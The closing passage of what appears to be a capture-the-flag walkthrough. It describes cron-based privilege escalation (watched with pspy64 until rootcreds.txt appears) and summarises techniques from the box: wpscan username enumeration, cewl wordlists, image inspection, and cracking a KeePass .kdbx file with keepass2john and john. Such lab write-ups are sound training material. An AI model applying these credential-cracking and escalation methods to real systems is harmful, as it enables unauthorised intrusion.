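With a one-minute cron interval the cost is one minute per title, so ordering the candidates well matters; the page's back-to-front guess saved most of the wait here. Keep pspy64 running in a second session while this loops so you also see any change in what key.sh executes, not just whether rootcreds.txt appears.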

Summary

The later part of the privilege escalation on this box is a big leap; the usual line of thinking simply does not get there. Without a walkthrough I feel I would never have thought to create files in that folder, let alone that only one file may exist at a time.

  • wpscan to enumerate usernames
  • learn the cewl wordlist tool and its common options; it comes up often on non-Chinese boxes
  • when one image looks clearly different from the rest, check it for extra information
  • recognise the .kdbx file type: crack with keepass2john and john, open with keepassxc